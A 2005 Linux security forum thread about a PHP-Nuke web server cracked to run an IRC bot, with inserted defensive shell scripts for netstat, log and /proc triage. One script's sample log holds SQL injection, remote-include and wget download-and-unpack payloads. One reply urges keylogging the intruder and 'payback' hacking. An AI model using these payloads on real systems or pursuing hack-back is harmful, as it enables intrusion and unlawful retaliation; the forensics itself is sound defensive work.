LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Old 04-04-2005, 05:01 AM   #1
Avatar33
Server compromised?


Hi all.

I'm very worried about the security of my company's server. We only have a web server and sshd running on it.
It's a Mandrake 9.2 machine with apache2-2.0.47 on it. When looking at the syslog I started getting suspicious. I then did a netstat -anp, which made me even more worried. Here is how it looks:
Code:
tcp        0      1 192.16.4.2:57467        62.235.13.228:6667      SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57471        207.96.122.250:6665     SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57464        207.173.16.33:6667      SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57472        66.28.140.14:6667       SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57461        69.16.172.34:6667       SYN_SENT    29891/init
tcp        0      1 192.16.4.2:57465        62.179.100.76:6667      SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57468        201.224.87.98:6667      SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57460        195.54.102.4:6667       SYN_SENT    29891/init
tcp        0      1 192.16.4.2:57463        62.250.14.6:6669        SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57474        195.47.220.2:6667       SYN_SENT    9170/inetd
tcp        0      1 192.16.4.2:57473        202.91.34.9:6667        SYN_SENT    25958/apache
tcp        0      1 192.16.4.2:57470        193.110.95.1:6667       SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57462        208.247.17.10:6667      SYN_SENT    29891/init
tcp        0      1 192.16.4.2:57475        195.197.175.21:7000     SYN_SENT    9170/inetd
tcp        0      1 192.16.4.2:57469        199.184.165.133:6667    SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57466        140.99.102.4:6667       SYN_SENT    13199/uptime
Note: I've not used my server's real IP address (192.16.4.2).
I've found out that all these programs that are trying to access IRC (is this correct?) are running under the apache user, which means that our web server has been hacked, or so I think. Luckily the firewall is blocking these outgoing messages. Also there was a program called "mech" running, doing exactly the same as the programs above, but I've now killed it, so it's no longer running. It is also interesting that this mech program was located in /var/tmp/PsY/

Well, I think it is quite obvious what my question is. Is there a vulnerability in my web server configuration, and how do I go about finding it? Any suggested reading that I should do?

Also, I've been using Tripwire, so I'm going to go through its report to try to find out what has happened.

Any advice would be greatly appreciated!
Avatar
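
The triage the poster did by eye, as an added example that is not part of the original thread: a small POSIX shell script that reads `netstat -anp` output, keeps the sockets whose remote port is in the IRC range (6660-7000, an assumed range), groups them by PID and program name, and flags names that have no business on an outbound socket. The sample input is constructed from the lines shown above plus a few benign entries. On a suspect box, feed it output from a known-good netstat (rescue CD), because a rootkit may have replaced the installed binary.

```shell
#!/bin/sh
# Added example: triage `netstat -anp` output for outbound IRC connections.
# NETSTAT_SAMPLE is constructed for this example (the poster's lines plus
# a few benign sockets); it is not a live capture.

NETSTAT_SAMPLE='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      1 192.16.4.2:57467        62.235.13.228:6667      SYN_SENT    13199/uptime
tcp        0      1 192.16.4.2:57461        69.16.172.34:6667       SYN_SENT    29891/init
tcp        0      1 192.16.4.2:57474        195.47.220.2:6667       SYN_SENT    9170/inetd
tcp        0      1 192.16.4.2:57473        202.91.34.9:6667        SYN_SENT    25958/apache
tcp        0      1 192.16.4.2:57475        195.197.175.21:7000     SYN_SENT    9170/inetd
tcp        0      0 192.16.4.2:22           10.1.1.7:51022          ESTABLISHED 1234/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1100/apache2
udp        0      0 0.0.0.0:123             0.0.0.0:*                           980/ntpd'

irc_connections() {
    # Input: netstat -anp text as $1, or on stdin when no argument is given.
    # Output: "pid program foreign_address state" for every socket whose
    # remote port is in the assumed IRC range 6660-7000.
    if [ $# -gt 0 ]; then printf '%s\n' "$1"; else cat; fi | awk '
        $1 ~ /^(tcp|udp)/ {
            n = split($5, r, ":"); port = r[n] + 0     # last ":" field is the port
            if (port < 6660 || port > 7000) next
            state = (NF >= 7) ? $6 : "-"               # udp lines have no State column
            split($NF, p, "/")                         # PID/Program name
            print p[1], p[2], $5, state
        }'
}

summarize_by_process() {
    # Reads irc_connections output; prints "pid program count", busiest first.
    awk '{ c[$1 " " $2]++ } END { for (k in c) print k, c[k] }' | sort -k3,3nr -k1,1n
}

flag_impostors() {
    # Reads summarize_by_process output. init is always PID 1; inetd only
    # listens and uptime exits immediately, so neither should hold an
    # outbound socket. Anything else gets a manual review.
    awk '
        $2 == "init" && $1 != 1 { print $0, "IMPOSTOR: init is always PID 1"; next }
        $2 == "inetd" || $2 == "uptime" { print $0, "IMPOSTOR: " $2 " never opens outbound sockets"; next }
        { print $0, "REVIEW: legitimate name, but no business on IRC" }'
}

# Stand-alone run against the constructed sample. On a live box:
#   netstat -anp | irc_connections | summarize_by_process | flag_impostors
irc_connections "$NETSTAT_SAMPLE" | summarize_by_process | flag_impostors
```

The program-name column is whatever the process chose for argv[0], so a match on "init" or "inetd" proves nothing; the script only uses the name to say which entries cannot be what they claim. The real identification comes from /proc/<PID>/exe, as discussed later in the thread.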
 
Old 04-04-2005, 05:31 AM   #2
ilikejam
Hi.

Yes you've been cracked. Do a google search for 'psy.tgz' for further info.

Before you do that, though, get that server off the network - who knows what else it's being used for.

Dave
 
Old 04-04-2005, 08:08 AM   #3
Avatar33
Original Poster
Thanks Dave for your reply.

I took the server off the net. But I would really like to learn more about what happened, or else it will keep happening.
I've taken a look at the syslog, and it seems Shorewall started blocking these IRC requests on 23 March. So I've not been very observant :-(

Surely there is some way to search the relevant logs for events that happened around that time? I just don't know which logs to check. I'm guessing that whoever hacked the server wanted to keep this server accessible for later on, so there must be something in the startup scripts (or similar) that I can use to find more info.

I've also found out that apache now has port 4000 open (the door for the hacker, I'm guessing).

How would I find out if the person has hacked only apache or has been able to hack root?

I really want to use this bad experience as a way to learn more about security, so _any_ hints or additional info would really be appreciated.

Thanks
Avatar
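
One way to do the log search the poster is asking about, as an added example that is not part of the original thread: take the timestamp of the first firewall rejection of an outbound IRC connection from syslog (this narrows the window to look at), then run the Apache access log through a filter that URL-decodes each request line and flags command-injection and SQL-injection indicators. Both log samples are constructed for this example; the Shorewall log prefix layout is assumed from its usual "Shorewall:chain:disposition:" form, and the request payloads are generic illustrations, not a reproduction of any particular PHP-Nuke exploit.

```shell
#!/bin/sh
# Added example: find when the bot first phoned home, then triage access_log.
# SYSLOG_SAMPLE and ACCESS_SAMPLE are constructed for this example.

SYSLOG_SAMPLE='Mar 22 23:58:01 web sshd[4401]: Accepted publickey for admin from 10.1.1.7 port 40122 ssh2
Mar 23 04:12:07 web kernel: Shorewall:fw2net:REJECT:IN= OUT=eth0 SRC=192.16.4.2 DST=62.235.13.228 PROTO=TCP SPT=57467 DPT=6667 SYN
Mar 23 04:12:07 web kernel: Shorewall:fw2net:REJECT:IN= OUT=eth0 SRC=192.16.4.2 DST=195.197.175.21 PROTO=TCP SPT=57475 DPT=7000 SYN
Mar 23 04:14:09 web kernel: Shorewall:fw2net:REJECT:IN= OUT=eth0 SRC=192.16.4.2 DST=69.16.172.34 PROTO=TCP SPT=57461 DPT=6667 SYN'

ACCESS_SAMPLE='10.1.1.7 - - [22/Mar/2005:09:14:03 +0200] "GET /index.php HTTP/1.1" 200 4120 "-" "Mozilla/4.0"
10.1.1.7 - - [23/Mar/2005:03:41:55 +0200] "GET /index.php?name=Search&query=linux HTTP/1.1" 200 3311 "-" "Mozilla/4.0"
203.0.113.9 - - [23/Mar/2005:03:52:10 +0200] "GET /index.php?id=1%27%20UNION%20SELECT%20user,pwd%20FROM%20admins-- HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
203.0.113.9 - - [23/Mar/2005:03:55:41 +0200] "GET /index.php?page=http://203.0.113.9/x.txt%3F&cmd=cd%20/var/tmp%3Bwget%20http://203.0.113.9/psy.tgz%3Btar%20zxf%20psy.tgz HTTP/1.1" 200 612 "-" "Mozilla/4.0"
203.0.113.9 - - [23/Mar/2005:04:01:02 +0200] "GET /index.php?cmd=%60id%60 HTTP/1.1" 200 301 "-" "Mozilla/4.0"'

first_firewall_block() {
    # Reads syslog on stdin; prints the timestamp of the earliest firewall line
    # that logged an outbound connection to an IRC port (6660-6999 or 7000).
    awk '/Shorewall/ && /DPT=(6(6[6-9]|[7-9][0-9])[0-9]|7000)([^0-9]|$)/ { print $1, $2, $3; exit }'
}

suspect_requests() {
    # Reads Apache access_log (common/combined format) on stdin. URL-decodes the
    # request line and prints "client date status reasons :: request" for each
    # line that matches an injection indicator. Extend the patterns for your site.
    awk -F'"' '
    function hex2dec(h,   i, n) {
        n = 0
        for (i = 1; i <= length(h); i++)
            n = n * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
        return n
    }
    function urldecode(s,   out, i, hex) {
        out = ""
        while ((i = index(s, "%")) > 0) {
            hex = substr(s, i + 1, 2)
            if (hex ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                out = out substr(s, 1, i - 1) sprintf("%c", hex2dec(hex))
                s = substr(s, i + 3)
            } else {                       # stray "%": keep it literally
                out = out substr(s, 1, i)
                s = substr(s, i + 1)
            }
        }
        return out s
    }
    {
        split($1, pre, " "); client = pre[1]; date = pre[4]; sub(/^\[/, "", date)
        split($3, post, " "); status = post[1]
        req = urldecode($2)
        reason = ""
        if (req ~ /(^|[^a-z])(wget|curl|lynx|fetch)[^a-z]/)       reason = reason "downloader "
        if (req ~ /\/(var\/tmp|tmp|dev\/shm)([^a-zA-Z0-9_]|$)/)   reason = reason "scratch-dir "
        if (req ~ /[;|`]|\$\(/)                                   reason = reason "shell-metachar "
        if (tolower(req) ~ /union[ +]+select/)                    reason = reason "sql-injection "
        if (reason != "") print client, date, status, reason "::", req
    }'
}

top_clients() {
    # Reads suspect_requests output; counts flagged requests per client address.
    awk '{ c[$1]++ } END { for (k in c) print k, c[k] }' | sort -k2,2nr
}

# Stand-alone run. On a live box (from a rescue CD, against the mounted disk):
#   first_firewall_block < /var/log/messages
#   suspect_requests < /var/log/httpd/access_log | top_clients
echo "bot first blocked: $(printf '%s\n' "$SYSLOG_SAMPLE" | first_firewall_block)"
printf '%s\n' "$ACCESS_SAMPLE" | suspect_requests
printf '%s\n' "$ACCESS_SAMPLE" | suspect_requests | top_clients
```

Decoding before matching matters: an attacker sends `%3B` and `%60`, not `;` and backticks, so a grep on the raw log misses them. Once a client address stands out, pull every request from that address in the window, including the ones with a 200 status that looked innocent, since the first probe often is.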
 
Old 04-04-2005, 07:48 PM   #4
Krugger
I just had an idea.

How about you put a nice keylogger on it and another computer bridging the connection, so you can sniff it without the hacker noticing?

Now you let the hacker play around on your server, and he is bound to log into something or do some stuff. So you log his passwords and get to know his IP and, as he seems to like IRC, his nick and other info on him. You might even find out how he is getting in.

You would hack the hacker. You can then do what you want, but I would say payback time.
 
Old 04-04-2005, 10:06 PM   #5
Capt_Caveman
First, let me say that a complete format and reinstall will be necessary when you're done doing forensics.

Probably good places to start looking would be the apache/httpd logs, for any abnormal error messages. Also look through the general system logs for anything suspicious. You should definitely download and run Rootkit Hunter and chkrootkit on the system, as there are a bunch of things listening as services that shouldn't be (like init, for example), which makes a rootkit likely. If that's the case, then you may need to use a CD-based distro like knoppix-std or FIRE to do any further analysis.

You may have some luck looking those processes up by their process ID number in /proc/<PID>/cmdline. If you find anything interesting there (like a path to the binary), take a look at the contents and see what you can find.

With regard to how you got cracked, what version of apache were you running? Were you hosting any content other than static HTML pages, like CGI or PHP, for example? File permissions for stuff in the server root?
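
The /proc lookup suggested above, scripted, as an added example that is not part of the original thread. It walks every PID directory, reads the exe and cwd links, the cmdline and the Uid line of status, and flags a process when its binary sits in /tmp, /var/tmp or /dev/shm, has been deleted from disk, or calls itself init without being PID 1. The uid column is what answers the poster's later question of whether only the apache user or root was taken. To make it runnable offline it also builds a constructed /proc lookalike (an assumed layout mirroring the thread: the tools under /var/tmp/PsY, running as an assumed apache uid of 48). One caveat: a kernel rootkit can hide entries from /proc, so a clean result here is not proof of a clean box.

```shell
#!/bin/sh
# Added example: flag suspicious processes from /proc. Works on the real
# /proc ("scan_proc /proc") and on the constructed tree built by make_fake_proc.

scan_proc() {
    # $1: procfs root (default /proc). Prints one line per suspicious process:
    #   <pid> uid=<uid> exe=<path> cmd="<argv>" -- <verdicts>
    procroot=${1:-/proc}
    for d in "$procroot"/[0-9]*; do
        [ -d "$d" ] || continue
        pid=${d##*/}
        exe=$(readlink "$d/exe" 2>/dev/null || echo '?')
        cwd=$(readlink "$d/cwd" 2>/dev/null || echo '?')
        cmd=$(tr '\0' ' ' 2>/dev/null < "$d/cmdline" | sed 's/ *$//' || true)
        uid=$(awk '/^Uid:/ { print $2; exit }' "$d/status" 2>/dev/null || true)
        verdict=""
        case "$exe" in
            /tmp/*|/var/tmp/*|/dev/shm/*) verdict="exe in scratch dir" ;;
        esac
        case "$exe" in                           # the kernel appends this marker itself
            *" (deleted)") verdict="${verdict:+$verdict; }exe deleted from disk" ;;
        esac
        case "$cwd" in
            /tmp/*|/var/tmp/*|/dev/shm/*) verdict="${verdict:+$verdict; }cwd in scratch dir" ;;
        esac
        case "$cmd" in
            init|init\ *) if [ "$pid" -ne 1 ]; then verdict="${verdict:+$verdict; }init but not PID 1"; fi ;;
        esac
        if [ -n "$verdict" ]; then
            printf '%s uid=%s exe=%s cmd="%s" -- %s\n' "$pid" "${uid:-?}" "$exe" "$cmd" "$verdict"
        fi
    done
}

make_fake_proc() {
    # Constructed /proc lookalike for offline testing (assumed layout; uid 48
    # stands in for the apache user). $1: directory to populate.
    fakeroot=$1
    mkproc() {  # mkproc <pid> <uid> <exe target> <cwd target> <argv...>
        mkdir -p "$fakeroot/$1"
        printf 'Uid:\t%s\t%s\t%s\t%s\n' "$2" "$2" "$2" "$2" > "$fakeroot/$1/status"
        ln -s "$3" "$fakeroot/$1/exe"
        ln -s "$4" "$fakeroot/$1/cwd"
        p=$1; shift 4
        printf '%s\0' "$@" > "$fakeroot/$p/cmdline"   # NUL-separated like the kernel
    }
    mkproc 1     0  /sbin/init                        /            init
    mkproc 1100  0  /usr/sbin/httpd                   /            /usr/sbin/httpd -k start
    mkproc 29891 48 /var/tmp/PsY/init                 /var/tmp/PsY init
    mkproc 13199 48 "/var/tmp/PsY/uptime (deleted)"   /var/tmp/PsY uptime
    mkproc 9170  48 /var/tmp/PsY/inetd                /var/tmp/PsY inetd
}

# Stand-alone run against the constructed tree; on a live box use: scan_proc /proc
demo=$(mktemp -d)
make_fake_proc "$demo"
scan_proc "$demo"
rm -rf "$demo"
```

The exe link is the binary the kernel actually mapped, which is why it beats the name shown by ps or netstat: a bot can call itself init, but it cannot make /proc/<PID>/exe point at /sbin/init. If the binary was unlinked after launch, the link still resolves for reading, so `cp /proc/<PID>/exe /mnt/evidence/` recovers a copy before the process is killed.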
 
Old 04-05-2005, 04:13 PM   #6
Avatar33
Original Poster
Thanks, guys, for your replies.

I'm not in front of my server right now, so all the info I post now is out of my head.

I will make sure that I format and reinstall once I've done my detective work.
I have run chkrootkit and found an infected item (I will post more detail later, when I'm in front of my box) listening on port 4000.

I've found the directory where the hacker downloaded/placed his tools. It's in /var/tmp, if I'm not mistaken, and that directory is owned by the apache user. And yes, init was running and located in this directory. What is the relevance of init running?

Quote:
With regard to how you got cracked, what version of apache were you running? Were you hosting any content other than static HTML pages, like CGI or PHP, for example? File permissions for stuff in the server root?
I was running apache 2.0.47, with a PHP-Nuke based site. I've not heard of any hacks against PHP-Nuke, so it might have been the apache version that had problems? There were very few ports open: a few required ports, port 80, and port 22 (for ssh, used only with private/public keys).

Thanks very much for the links, I see I have much reading to do.

Cheers
Avatar
 
Old 04-05-2005, 04:32 PM   #7
nistelrooy
PHP-Nuke is one of the most vulnerability-prone CMSs I've ever used/experienced. Convert to PostNuke or get another CMS to work with. What version is your PHP-Nuke?
 
Old 04-08-2005, 04:27 PM   #8
mikeheggy
I've read up on PHP-Nuke too, and wanted to start a website using that program, but I was apprehensive about it.

To prevent something like this again, you might want to try the patched versions from Nuke fixes, which, among other things, filter out MySQL injection attacks.

Also, check out mod_security for Apache. This prevents popular web attacks before they reach the script. I use the rules from http://www.gotroot.com/mod_security+rules
 
Old 04-11-2005, 07:07 AM   #9
Avatar33
Original Poster
Sorry for the delay.

We were using PHP-Nuke 7.4.

I'll take a look at mod_security.
Thanks all for your help.
Avatar
 
Old 04-11-2005, 07:39 AM   #10
aqoliveira
howzit

Check /var/log/messages and /var/log/secure files as well

cheers
boot
lekker blei
 
Old 05-08-2005, 06:48 AM   #11
comptiger5000
Once you're done hacking the hacker, report as much as possible about him to the FBI.
 
Old 05-09-2005, 09:19 AM   #12
matrixcubed
You might consider using chkrootkit as well, to detect any malicious software which might have been installed recently!
 
  


All times are GMT -5.